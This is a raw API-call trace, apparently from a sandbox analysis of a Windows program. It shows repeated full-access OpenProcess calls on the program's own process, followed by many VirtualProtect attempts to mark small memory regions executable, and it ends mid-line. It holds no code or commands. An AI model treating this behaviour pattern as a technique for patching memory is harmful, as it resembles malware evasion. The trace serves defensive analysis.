GetCurrentProcessId () returned 0x678 [0175.270] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xb78 [0175.270] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xbfc [0175.270] GetCurrentProcessId () returned 0x678 [0175.270] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xc2c [0175.271] GetCurrentProcessId () returned 0x678 [0175.271] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xce0 [0175.271] GetCurrentProcessId () returned 0x678 [0175.271] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xd90 [0175.271] GetCurrentProcessId () returned 0x678 [0175.271] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xdfc [0175.271] GetCurrentProcessId () returned 0x678 [0175.271] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xe44 [0175.272] GetCurrentProcessId () returned 0x678 [0175.272] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xef4 [0175.272] GetCurrentProcessId () returned 0x678 [0175.272] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xfa8 [0175.272] GetCurrentProcessId () returned 0x678 [0175.272] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x105c [0175.272] GetCurrentProcessId () returned 0x678 [0175.272] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1060 [0175.272] GetCurrentProcessId () returned 0x678 [0175.272] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1110 [0175.273] GetCurrentProcessId () returned 0x678 [0175.273] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x11c0 [0175.273] GetCurrentProcessId () returned 0x678 [0175.273] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1274 [0175.273] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1324 [0175.273] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1338 [0175.274] GetCurrentProcessId () returned 0x678 [0175.274] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x13d8 [0175.274] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x148c [0175.274] GetCurrentProcessId () returned 0x678 [0175.274] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1540 [0175.274] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x15f0 [0175.275] GetCurrentProcessId () returned 0x678 [0175.275] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x16a4 [0175.275] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x16a8 [0175.275] GetCurrentProcessId () returned 0x678 [0175.275] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1758 [0175.275] GetCurrentProcessId () returned 0x678 [0175.275] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x180c [0175.276] GetCurrentProcessId () returned 0x678 [0175.276] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x18c0 [0175.276] GetCurrentProcessId () returned 0x678 [0175.276] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1970 [0175.276] GetCurrentProcessId () returned 0x678 [0175.276] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1a24 [0175.276] GetCurrentProcessId () returned 0x678 [0175.276] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1ac8 [0175.277] GetCurrentProcessId () returned 0x678 [0175.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1ad4 [0175.277] GetCurrentProcessId () returned 0x678 [0175.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1b88 [0175.277] GetCurrentProcessId () returned 0x678 [0175.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1c3c [0175.277] GetCurrentProcessId () returned 0x678 [0175.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1cf0 [0175.278] GetCurrentProcessId () returned 0x678 [0175.278] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1da0 [0175.278] GetCurrentProcessId () returned 0x678 [0175.278] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1e54 [0175.278] GetCurrentProcessId () returned 0x678 [0175.278] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1f04 [0175.279] GetCurrentProcessId () returned 0x678 [0175.279] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x1fb8 [0175.279] GetCurrentProcessId () returned 0x678 [0175.279] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x206c [0175.279] GetCurrentProcessId () returned 0x678 [0175.279] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2120 [0175.279] GetCurrentProcessId () returned 0x678 [0175.279] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x21d0 [0175.280] GetCurrentProcessId () returned 0x678 [0175.280] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2284 [0175.280] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2334 [0175.280] GetCurrentProcessId () returned 0x678 [0175.280] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x23e8 [0175.280] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x249c [0175.281] GetCurrentProcessId () returned 0x678 [0175.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2550 [0175.281] GetCurrentProcessId () returned 0x678 [0175.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x25a8 [0175.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2600 [0175.281] GetCurrentProcessId () returned 0x678 [0175.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x26b4 [0175.281] GetCurrentProcessId () returned 0x678 [0175.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2768 [0175.282] GetCurrentProcessId () returned 0x678 [0175.282] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x281c [0175.282] GetCurrentProcessId () returned 0x678 [0175.282] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x28d0 [0175.283] GetCurrentProcessId () returned 0x678 [0175.283] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2980 [0175.283] GetCurrentProcessId () returned 0x678 [0175.283] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2a34 [0175.283] GetCurrentProcessId () returned 0x678 [0175.283] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2ae4 [0175.283] GetCurrentProcessId () returned 0x678 [0175.283] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2b98 [0175.284] GetCurrentProcessId () returned 0x678 [0175.284] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2c4c [0175.284] GetCurrentProcessId () returned 0x678 [0175.284] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2cc8 [0175.284] GetCurrentProcessId () returned 0x678 [0175.284] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2d00 [0175.284] GetCurrentProcessId () returned 0x678 [0175.284] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2db0 [0175.285] GetCurrentProcessId () returned 0x678 [0175.285] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2e64 [0175.285] GetCurrentProcessId () returned 0x678 [0175.285] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2f14 [0175.285] GetCurrentProcessId () returned 0x678 [0175.285] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2fc8 [0175.285] GetCurrentProcessId () returned 0x678 [0175.285] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x307c [0175.286] GetCurrentProcessId () returned 0x678 [0175.286] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3130 [0175.286] GetCurrentProcessId () returned 0x678 [0175.286] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x31e0 [0175.286] GetCurrentProcessId () returned 0x678 [0175.286] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3294 [0175.286] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3344 [0175.287] GetCurrentProcessId () returned 0x678 [0175.287] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x33f8 [0175.287] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x34ac [0175.287] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3550 [0175.287] GetCurrentProcessId () returned 0x678 [0175.287] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3560 [0175.288] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3610 [0175.288] GetCurrentProcessId () returned 0x678 [0175.288] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x36c4 [0175.288] GetCurrentProcessId () returned 0x678 [0175.288] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3778 [0175.288] GetCurrentProcessId () returned 0x678 [0175.288] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x382c [0175.289] GetCurrentProcessId () returned 0x678 [0175.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x38e0 [0175.289] GetCurrentProcessId () returned 0x678 [0175.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3990 [0175.289] GetCurrentProcessId () returned 0x678 [0175.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3a44 [0175.289] GetCurrentProcessId () returned 0x678 [0175.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3af4 [0175.290] GetCurrentProcessId () returned 0x678 [0175.290] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3ba8 [0175.290] GetCurrentProcessId () returned 0x678 [0175.290] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3c5c [0175.290] GetCurrentProcessId () returned 0x678 [0175.290] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3d10 [0175.290] GetCurrentProcessId () returned 0x678 [0175.290] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3dc0 [0175.291] GetCurrentProcessId () returned 0x678 [0175.291] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3e74 [0175.291] GetCurrentProcessId () returned 0x678 [0175.291] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3f24 [0175.291] GetCurrentProcessId () returned 0x678 [0175.291] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3f90 [0175.291] GetCurrentProcessId () returned 0x678 [0175.291] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3fd8 [0175.292] GetCurrentProcessId () returned 0x678 [0175.292] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x408c [0175.292] GetCurrentProcessId () returned 0x678 [0175.292] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4140 [0175.292] GetCurrentProcessId () returned 0x678 [0175.292] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x41f0 [0175.293] GetCurrentProcessId () returned 0x678 [0175.293] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x42a4 [0175.293] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4354 [0175.293] GetCurrentProcessId () returned 0x678 [0175.293] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x440c [0175.293] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x44bc [0175.294] GetCurrentProcessId () returned 0x678 [0175.294] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4570 [0175.294] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4620 [0175.294] GetCurrentProcessId () returned 0x678 [0175.294] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x46d4 [0175.294] GetCurrentProcessId () returned 0x678 [0175.294] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4788 [0175.295] GetCurrentProcessId () returned 0x678 [0175.295] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x483c [0175.295] GetCurrentProcessId () returned 0x678 [0175.295] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x48f0 [0175.295] GetCurrentProcessId () returned 0x678 [0175.295] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x49a0 [0175.295] GetCurrentProcessId () returned 0x678 [0175.295] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4a54 [0175.296] GetCurrentProcessId () returned 0x678 [0175.296] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4b04 [0175.296] GetCurrentProcessId () returned 0x678 [0175.296] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4bb8 [0175.296] GetCurrentProcessId () returned 0x678 [0175.296] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4bdc [0175.296] GetCurrentProcessId () returned 0x678 [0175.296] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4c6c [0175.297] GetCurrentProcessId () returned 0x678 [0175.297] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4d20 [0175.297] GetCurrentProcessId () returned 0x678 [0175.297] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4dd0 [0175.297] GetCurrentProcessId () returned 0x678 [0175.297] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4e84 [0175.298] GetCurrentProcessId () returned 0x678 [0175.298] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4f34 [0175.299] GetCurrentProcessId () returned 0x678 [0175.299] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4fe8 [0175.299] GetCurrentProcessId () returned 0x678 [0175.299] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x509c [0175.299] GetCurrentProcessId () returned 0x678 [0175.299] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5150 [0175.299] GetCurrentProcessId () returned 0x678 [0175.300] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5200 [0175.300] GetCurrentProcessId () returned 0x678 [0175.300] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x52b4 [0175.300] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5364 [0175.300] GetCurrentProcessId () returned 0x678 [0175.300] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x541c [0175.301] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x54cc [0175.301] GetCurrentProcessId () returned 0x678 [0175.301] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5580 [0175.301] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5630 [0175.301] GetCurrentProcessId () returned 0x678 [0175.301] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x56e4 [0175.302] GetCurrentProcessId () returned 0x678 [0175.302] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5798 [0175.302] GetCurrentProcessId () returned 0x678 [0175.302] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x584c [0175.302] GetCurrentProcessId () returned 0x678 [0175.302] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5900 [0175.302] GetCurrentProcessId () returned 0x678 [0175.302] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x59b0 [0175.303] GetCurrentProcessId () returned 0x678 [0175.303] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5a64 [0175.303] GetCurrentProcessId () returned 0x678 [0175.303] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5aa0 [0175.303] GetCurrentProcessId () returned 0x678 [0175.303] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5b14 [0175.304] GetCurrentProcessId () returned 0x678 [0175.304] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5bc8 [0175.305] GetCurrentProcessId () returned 0x678 [0175.305] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5c7c [0175.305] GetCurrentProcessId () returned 0x678 [0175.305] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5d30 [0175.305] GetCurrentProcessId () returned 0x678 [0175.305] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5de0 [0175.305] GetCurrentProcessId () returned 0x678 [0175.305] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5e94 [0175.306] GetCurrentProcessId () returned 0x678 [0175.306] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5f44 [0175.306] GetCurrentProcessId () returned 0x678 [0175.306] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5ff8 [0175.306] GetCurrentProcessId () returned 0x678 [0175.306] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x60ac [0175.306] GetCurrentProcessId () returned 0x678 [0175.306] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6160 [0175.307] GetCurrentProcessId () returned 0x678 [0175.307] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6210 [0175.307] GetCurrentProcessId () returned 0x678 [0175.307] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x62c4 [0175.307] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6374 [0175.307] GetCurrentProcessId () returned 0x678 [0175.307] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x642c [0175.308] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x64dc [0175.308] GetCurrentProcessId () returned 0x678 [0175.308] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6590 [0175.308] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6640 [0175.308] GetCurrentProcessId () returned 0x678 [0175.308] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x66f4 [0175.309] GetCurrentProcessId () returned 0x678 [0175.309] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x67a8 [0175.309] GetCurrentProcessId () returned 0x678 [0175.309] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x685c [0175.309] GetCurrentProcessId () returned 0x678 [0175.309] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6910 [0175.309] GetCurrentProcessId () returned 0x678 [0175.310] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x69c0 [0175.310] GetCurrentProcessId () returned 0x678 [0175.310] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6a74 [0175.310] GetCurrentProcessId () returned 0x678 [0175.310] GetCurrentProcessId () returned 0x678 [0175.310] GetCurrentProcessId () returned 0x678 [0175.311] GetCurrentProcessId () returned 0x678 [0175.311] GetCurrentProcessId () returned 0x678 [0175.311] GetCurrentProcessId () returned 0x678 [0175.311] GetCurrentProcessId () returned 0x678 [0175.311] GetCurrentProcessId () returned 0x678 [0175.312] GetCurrentProcessId () returned 0x678 [0175.312] GetCurrentProcessId () returned 0x678 [0175.312] GetCurrentProcessId () returned 0x678 [0175.312] GetCurrentProcessId () returned 0x678 [0175.313] GetCurrentProcessId () returned 0x678 [0175.314] GetCurrentProcessId () returned 0x678 [0175.314] GetCurrentProcessId () returned 0x678 [0175.314] GetCurrentProcessId () returned 0x678 [0175.314] GetCurrentProcessId () returned 0x678 [0175.315] GetCurrentProcessId () returned 0x678 [0175.315] GetCurrentProcessId () returned 0x678 [0175.315] GetCurrentProcessId () returned 0x678 [0175.315] GetCurrentProcessId () returned 0x678 [0175.315] GetCurrentProcessId () returned 0x678 [0175.315] GetCurrentProcessId () returned 0x678 [0175.316] GetCurrentProcessId () returned 0x678 [0175.316] GetCurrentProcessId () returned 0x678 [0175.316] GetCurrentProcessId () returned 0x678 [0175.316] GetCurrentProcessId () returned 0x678 [0181.744] VirtualProtect (in: lpAddress=0x5bf0178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5bf01a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5bf01c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5bf01f0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5bf0218, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c5512e, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c55122, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c54800, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c5513c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c55160, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c55168, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.745] VirtualProtect (in: lpAddress=0x5c5516c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c55174, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c55178, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c5517c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c55180, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c55188, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c5518c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c55194, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c55198, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c5519c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c551a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c551a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c551ac, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: 